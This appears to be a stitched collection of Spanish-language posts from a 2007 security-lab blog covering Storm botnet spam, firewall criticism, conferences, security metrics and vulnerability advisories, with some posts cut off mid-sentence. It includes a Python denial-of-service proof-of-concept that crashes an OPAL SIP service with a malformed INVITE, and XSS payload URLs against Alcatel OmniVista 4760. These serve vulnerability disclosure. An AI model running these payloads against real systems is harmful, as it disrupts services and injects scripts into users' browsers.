Justo ayer comentábamos la nueva oleada de correos con el tema de Halloween con el esqueleto danzarín, pero hoy ya hemos empezado a recibir unas imágenes más elaboradas (siempre con el link al Zhelatin, Nuwar o cómo lo queramos llamar).
Justo después de que Apple anunciara el esperadísimo lanzamiento de su nuevo sistema operativo (Leopard) ya hay controversias sobre su seguridad.
Supuestamente Apple ha apostado por la seguridad para su nuevo lanzamiento, siendo una de las premisas en su diseño. Parece ser que tendrán que hacer algo para mejorar este aspecto porque algo tan importante como el correcto funcionamiento de su Firewall se pone en entredicho en este artículo.
El problema detectado es el decepcionante funcionamiento de su firewall, se le realizan una serie de pruebas de las que desafortunadamente no queda muy bien parado.
Por defecto el firewall no queda activado, da igual que en versiones anteriores lo estuviera, al actualizar se desactiva. El bloqueo de puertos tampoco es todo lo correcto que debiera, ya que aunque se seleccione que se bloqueen todas las conexiones entrantes algunas de ellas son accesibles desde el exterior.
Conclusión, volver a configurar al probado aunque vetusto “ipfw” para que solucione el problema.
José María Arce
S21sec labs
El pasado 26 de Octubre participamos en las Conferencias FIST edición Barcelona. El evento contó con la participación de más de 60 personas.
Por nuestra parte fue Christian Martorella de S21sec quien ofreció una presentación sobre técnicas de recolección de información de fuentes públicas (Information Gathering).
Podéis descargar la presentación de Christian en formato PDF.
Desde hoy tenemos una nueva oleada de correos no solicitados enviados por Storm buscando nuevos integrantes a su botnet. Está vez, coincidiendo con el día de Todos los Santos (Halloween en otros países), enviar correos con el título 'The Dancing Skeleton': Do You Want To See New Funny Sexual Helloween Game With Dancing Skeleton? Just Click Here'.
Aprovechar una fecha señalada para infectar a nuevas computadoras no es algo nuevo. Hace años ya recíbiamos en Diciembre las típicas postales de Navidad que solían incluir un troyano o más recientemente casos con el día de la Independencia de EEUU;si entramos a relacionar código malicioso con días señalados, tenemos el ejemplo claro del Jerusalem/Viernes 13, que también tuvo mucha virulencia en España (creo que muchos fuimos los afectados).
PINDEX contentLength = mime.GetContentLength();...entityBody[contentLength] = '\0';
#!/usr/bin/python
# opal228_crash.py by Jose Miguel Esparza
# 2007 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: opal228_crash.py target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:paco@192.168.1.134 SIP/2.0\r\n"+\
"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
"Contact:sip:pepe@192.168.1.133:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:pepe@192.168.1.133:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:paco@micasa.com\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()
La madurez de un sistema de gestión de seguridad y su nivel de calidad son dos conceptos que, aunque relacionados entre ellos, no siempre son considerados como elementos independientes incluso, en ocasiones, pueden dar pie a confusión (un sistema maduro no necesariamente es un sistema de calidad). A través de estas líneas intentaremos aportar algo de luz a este asunto y establecer las diferencias principales entre ambos conceptos aplicados sobre la seguridad de la información.
La madurez de un sistema de gestión de seguridad acostumbra a dar una medida del progreso del programa a lo largo del tiempo, es decir, el grado de avance o despliegue de las iniciativas de seguridad respecto a un objetivo marcado. Conforme el programa madura:
Un modelo de madurez tradicionalmente empleado para la valoración de los controles es el definido por COBIT (Control Objectives for Information and related Technology) y basado en la metodología CMM (Capability Marurity Model) desarrollado por la Carnegie Mellon School.
El mencionado modelo se basa en cinco niveles de madurez de 0 (no existente) a 5 (Optimizado), según la evaluación de los objetivos de control de los procesos de Sistemas de Información.
Nivel 0 (NO EXISTENTE) : Ausencia total de procesos reconocibles.
Nivel 1 (INICIAL): No existen procesos estándar aunque sí planteamientos “ad hoc” que se utilizan en cada situación.
Nivel 2 (REPETIBLE): Los procesos han evolucionado de forma que se siguen procedimientos similares para realizar la misma tarea. No existe formación ni comunicación de procedimientos estándar y la responsabilidad recae en el individuo.
Nivel 3 (DEFINIDO): La organización asegura que el control se planifica, documenta, ejecuta, monitoriza y controla.
Nivel 4 (GESTIONADO): Los procesos están en mejora continúa y proporcionan mejores prácticas. Se usan herramientas automatizadas de manera aislada o fragmentada.
Nivel 5 (OPTIMIZADO): Los procesos han sido revisados hasta un nivel de “best practice”, sobre la base de una mejora continua.
Este enfoque permite ir midiendo la evolución o involución de los Sistemas de Iinformación, lo cual es un buen cuadro para presentar a la Dirección ya que claramente permite hacer un seguimiento aún a personas no familiarizadas con los conceptos técnicos.
Un nivel de madurez elevado, no obstante, no implica necesariamente que la organización este “segura”: en caso que los elementos de seguridad no se hayan ejecutado con un nivel de calidad elevado, la seguridad de la organización continuará siendo deficiente. Pongamos un ejemplo:
Una política de seguridad documentada y aprobada por la Dirección es un síntoma de un sistema maduro (nivel 3). No obstante el nivel de Calidad será:
Por tanto, es recomendable una medida separada que indique el nivel de Calidad de la implantación.
El nivel de Calidad debe dar información sobre la calidad de implantación de cada elemento. Conforme el nivel de calidad aumenta, los procesos se van implantando y son seguidos por todas las partes implicadas.
La progresión en el tiempo hacia un objetivo marcado en cuanto a la Calidad permitirá establecer las acciones necesarias para la consecución de dicho objetivo.
Por tanto, sería aconsejable disponer de un indicador propio del nivel de Calidad asociado al propio indicador de seguridad, con una gama bien definida de los valores que se consideran aceptable, inaceptable y excelente (Alta, Media y Baja calidad, si se prefiere) que pueda ser identificada fácilmente por el público objetivo a quien se comunica la medida......y poder responder a ¿Cómo estamos?.
Pues al parecer, no. O esa es una de las razones dadas por los equipos de OpenBSD para resucitar el proyecto PCC (Portable C Compiler) y eliminar GCC, dado que en cada versión se hace más grande, más potente... y más enfermo ya que cada vez es más complicado de sanear y corregir. PCC fué el compilador quien en la década de los 70 destronó al mítico DMR (el compilador de C de Dennis Ritchie original) en los sistemas Unix. Aunque el código proviene de Caldera, la licencia es BSD-style para la mayor parte y ya se están rehaciendo las partes que no son BSD, obviamente con el equipo de OpenBSD mirando con lupa todo el código.
Dru Lavigne Blog
PCC
Discusión (mensajes Addendum GPLv3)
Eduardo Morrás
En plena guerra fría, durante los primeros años del Macarthismo y la amenaza nuclear entre los Estados Unidos y la URSS, Albert Einstein, hacía pública una de sus más famosas citas:
cialmente llamativo el ataque sufrido por Estonia en Mayo de 2007, que sucedió poco después de que Estonia retirase un monumento de la era Soviética que recordaba la lucha de los soldados de la URSS contra el fascismo en la Segunda Guerra Mundial.
jetivo con el mínimo daño posible, como apunta este artículo producido también durante la guerra de Kosovo, o el siguiente artículo de la revista TIME del año 1995, en el que según dicho artículo la intención del ejercito americano es de “aprovechar las maravillas tecnológicas del siglo 20 para lanzar rápidos, sigilosos, amplios y devastadores ataques en la infraestructura miliar y civil de un enemigo”.
Durante esta semana se celebra en La Haya el eChallenges 2007, una conferencia de la Unión Europea sobre tecnología que dura tres días (del 24 al 26 de Octubre) con la participación de más de 600 participantes.
El próximo viernes 26 de Octubre se celebra una nueva edición de las conferencias FIST, evento gratuito y abierto al público en el que voluntarios realizan una serie de presentaciones y coloquios sobre diversos aspectos relacionados con los Test de Intrusión y la Seguridad de
El programa es el siguiente:
18:00: Introducción Edge Security
18:10: pf + CARP: Construyendo un cortafuegos en alta disponibilidad
Carlos Fragoso (one-Esecurity)
19:00: Si no quieres que sepa tu nombre, ¿porqué llevas el dni en la
frente? Christian Martorella (S21sec)
19:50: Descanso
20:00: Inspect a Gadget (in Windows Vista) Rafael Dominguez (MWR InfoSecurity)
20:50: Dudas, preguntas.
21:00: Cierre
Localización: Facultat d'Informatica de Barcelona - UPC Aula máster (Edificio A3) C/Jordi Girona Salgado, 1-3, 08034 BARCELONA
Inscripción: Podéis inscribiros en el evento a través del siguiente enlace: http://www.fistconference.org/inscripcion/inscripcion.php
Os esperamos!
El escenario actual de los Sistemas de Información presenta una problemática y unos retos en materia de seguridad distintos de los que tenían los Sistemas de Información centralizados con acceso limitado (mainframe) de hace 15 o 20 años. La complejidad tecnológica existente plantea la compatibilidad e interoperabilidad entre herramientas para minimizar los problemas de gestión, el aumento del volumen de información, las transacciones y accesos que se deben securizar, así como el constante incremento de los riesgos de seguridad de las redes.
Las Organizaciones ven hoy la seguridad de sus activos tecnológicos como un requerimiento imprescindible para mantenerse en el negocio. La seguridad, no obstante, no debe verse como la implantación de unos Sistemas novedosos más o menos complejos, para solventar un problema puntual, sino como un proceso más general de mejora continua, donde se busque la continuidad del negocio y que debe cubrir todas las áreas y departamentos de una Organización. Es necesario disponer de mecanismos que permitan evaluar las soluciones implantadas en su conjunto y determinar el nivel de seguridad alcanzado, ya sea para saber si se está en un nivel de seguridad adecuado o bien si se está degradando el nivel de seguridad con el paso del tiempo. Esta evaluación continuada permitirá actuar de manera proactiva respecto a la seguridad, siendo conscientes del nivel adquirido y el nivel deseado, siempre desde un punto de vista de un proceso continuado. La mera implantación de herramientas con configuraciones estáticas conducirá al deterioro progresivo de la seguridad, aumentando la diferencia entre el riesgo percibido y el riesgo real. A la inversa, la mera existencia de políticas, controles y revisiones de auditoria no son efectivas si no van acompañadas de herramientas y medidas técnicas que permitan respuestas rápidas y automatizadas y a condiciones de vulnerabilidad en permanente evolución. La seguridad es un proceso, no un producto.
Las políticas corporativas mencionadas anteriormente son también necesarias y éstas deben ser globales, de forma que afecten e impliquen a toda la Organización y que, sobre todo, cuenten con el respaldo de la Dirección. Estas políticas deben desencadenar el desarrollo y la definición de unos procesos y procedimientos basados en metodologías de trabajo, con la implantación de controles organizativos y con el establecimiento de procesos de medición y auditorias para verificar y controlar la implantación de las políticas.
Por concluir: la búsqueda de una solución global que permita la gestión de forma continuada de la seguridad de los Sistemas de Información no es una tarea fácil. Resulta difícil decir cual será la mejor solución o producto global, puesto que las necesidades de las organizaciones pueden ser completamente distintas unas de las otras. Sin embargo, para una correcta coordinación entre las diferentes áreas de actuación comentadas, se deberá considerar como claves los siguientes aspectos:
1.- Coherencia y Equilibrio técnico y funcional: mediante la integración tecnológica y la compatibilidad de las distintas herramientas, así como el uso de estándares y soluciones abiertas frente a plataformas propietarias. Esta coherencia debe ser tanto a nivel tecnológico como funcional, dando soporte a los procedimientos, políticas, controles y auditorias que permita unificar criterios.
2.- Escalabilidad/Disponibilidad: que garantice el rendimiento ante anchos de banda crecientes, que permita el crecimiento e implantación de nuevos módulos, re-usabilidad de componentes y facilidad de gestión y monitorización.
Las dos mejores soluciones obtendrá como premio una copia del libro: The Shellcoder's Handbook: Discovering and Exploiting Security Holes (segunda edición).##############################################################
- S21Sec Advisory -
##############################################################
Title: Alcatel Omnivista 4760 Cross-Site Scripting
ID: S21SEC-038-en
Severity: Medium -
History: 10.Jun.2007 Vulnerability discovered
20.Jun.2007 Vendor contacted
15.Oct.2007 Advisory released
Authors: Juan de la Fuente Costa (jfuente@s21sec.com)
Pablo Seijo Cajaraville (pseijo@s21sec.com)
URL: http://www.s21sec.com/avisos/s21sec-038-en.txt
Release: Public
[ SUMMARY ]
Alcatel-Lucent OmniVista 4760 is an innovative, modular platform that provides a suite of network management applications.
This powerful Java-based tool, accessed through a Web browser, provides centralized management for the OmniPCX Enterprise.
The platform's open architecture enables today's IT managers and administrators to effectively monitor and maintain the
network, while lowering the company's total cost of ownership. This suite of network management applications includes:
* LDAP Directory
* Configuration
* Accounting/Performance Management
* Alarm Notification
* Network Topology
[ AFFECTED VERSIONS ]
This vulnerability has been tested in Alcatel Omnivista 4760.
[ DESCRIPTION ]
S21sec has discovered a vulnerability in Alcatel Omnivista 4760 that allows injecting JavaScript code in text variables.
This issue allows javascript code execution in the user browser.
The identified parameters are: "action" and "Langue"
Parameter: action
URL: http://www.somesite.com/php-bin/Webclient.php?action=<script>alert("xss")</script>
Parameter: Langue
URL: http://www.somesite.com/?Langue="><script>alert("xss")</script><";
En este blog hemos ido contando algunas de las oleadas de SPAM que recibíamos de la botnet Storm, tanto para ser infectados y pertenecer a su séquito, como simplemente SPAM puro y duro.
Ya ha salido un nuevo número del e-zine InSecurity, el número 3. Qué es un e-zine? Una revista electrónica, en este caso un pdf, hecho por no-profesionales, sobre un tema en concreto, hacking y en este caso gratuita. Que una revista de estas características llegue al número 3, 6 o 12 es todo un hito que, al menos en parte, ya han superado. Y además en castellano. Aunque algunos de los temas tratados no son lo último de lo último, otros me han sorprendido, como el de refrigeración al hablar de los nuevos desarrollos de intel o la creación rápida de un cluster bajo linux.
En fin, que después de leerlo, solo me falta gritar Hack the World!!
InSecurity.pdf
Eduardo Morrás
El pasado 4 de Octubre participamos en el evento de Microsoft 'Aségurate que estás seguro'. El evento, que fue un rotundo éxito, contó con la participación de más de 190 personas (podéis leer cómo fue el evento en el blog de Chema Alonso aka Maligno).
Desde hace ya bastante tiempo nos hemos ido encontrando con 'kits de phishing' en los que un usuario no necesita tener casi ningún conocimiento técnico para crear páginas intentando engañar a los usuarios. Casi siempre, estos kits o bien son una mezcla de scripts que realizan su trabajo, o son aplicaciones para Windows que facilitan su uso.
Cada vez es más común el viejo axioma que dice “no se puede mejorar lo que no se puede medir”. Afortunadamente este criterio utilizado en gran parte de los ámbitos de las organizaciones (contable-financiero, producción, ventas, etc.) está llegando también al ámbito de los Sistemas de Información en general y a la seguridad en particular.
El tradicional criterio utilizado para la toma de decisiones basado en la experiencia, el criterio (¿olfato?) de los responsables de las áreas tecnológicas, presiones externas o motivaciones puramente comerciales (la mejor herramienta del mercado “por si acaso”), están dando paso a basar la gestión en criterios cuantificables, medibles, comparables o contrastables que permitan analizar, valorar y comparar de manera objetiva.
Para ello es imprescindible disponer de la información que permita dar respuesta a preguntas básicas pero a la vez fundamentales como ¿cuál es la eficacia de nuestro sistema de seguridad?. ¿cuál es la eficiencia de dichos Sistema?, ¿Conocemos el nivel de madurez de nuestro sistema de seguridad? ¿y su nivel de Calidad?, ¿Existe la posibilidad que nuestros sistemas críticos queden fuera de servicio? ¿por qué?.
La información que va a permitir dar respuesta a estas y muchas otras preguntas en el ámbito de la gestión de la seguridad son los indicadores y métricas de seguridad, cada vez más populares gracias, entre otros, al estándar ISO 27001 que contempla como uno de sus requisitos la necesidad de medir la eficacia de los controles para verificar el cumplimiento de los requisitos de seguridad.
Así pues, conocida la realidad, sabiendo lo que está sucediendo en materia de seguridad y, en definitiva midiendo la seguridad se estará en disposición de tomar las decisiones oportunas en el momento idóneo gestionando de forma proactiva (antes que se produzcan situaciones y/o escenarios no deseados) la seguridad de nuestra información.
Por tanto, para resolver la incógnita planteada al inicio de estas líneas, muchos coincidiremos en que la medición nos va a llevar a la mejora continua.
Hasta ahora hemos visto los correos generados por Storm de todo tipo, pero la ola de correos que se está recibiendo ahora es algo que poca gente se esperaba: buscar el corazoncito de sus victimas.
##############################################################
- S21Sec Advisory -
##############################################################
Title: OPAL SIP Protocol Remote Denial of Service
ID: S21SEC-037-en
Severity: Medium - Remote DoS
History:
El proyecto OLPC (One Laptop Per Child) fue anunciado a finales de noviembre de 2005, durante una convención sobre internet en Tunez. El propósito de este proyecto, básicamente, es el de crear un ordenador portatil de bajo costo para proveer a cada niño en el mundo, acceso y conocimiento de las formas modernas de educación.
Cabe destacar dos aspectos importantes dentro del proyecto OLPC,
El congreso se estructuró en 9 sesiones que fundamentalmente se centraron en los siguientes temas: Evaluación y gestión del riesgo, modelado y representación de estos sistemas y sus dependencias, intercambio y compartición de información, continuidad de servicios ante situaciones imprevistas/previstas, seguridad técnica en SCADAs y modelado de amenazas y ataques. Además de los ponentes que defendían sus artículos hubo cuatro charlas invitadas (Adrian Gheorghe – Old Dominion University, US; Paulo Veríssimo – Universidade de Lisboa, Portugal; Donald Dudenhoeffer – Idaho National Labs, US; Jacques Bus – European Commission, INFSO Unit “Security”) que dieron interesantes puntos de vista sobre la importancia de la seguridad y la gestión del riesgo en las infraestructuras críticas así como de las actuales iniciativas a nivel europeo en esta materia.
De entre los artículos más interesantes destacamos:
A estas alturas del año creo que todos nosotros tenemos ya asumido que una gran parte de los riesgos externos vienen a través de vulnerabilidades en el navegador o en aplicaciones que podemos llamar 'aplicaciones Desktop': Office, Outlook, lectores de PDF, lectores de RSS, WinZip, ...
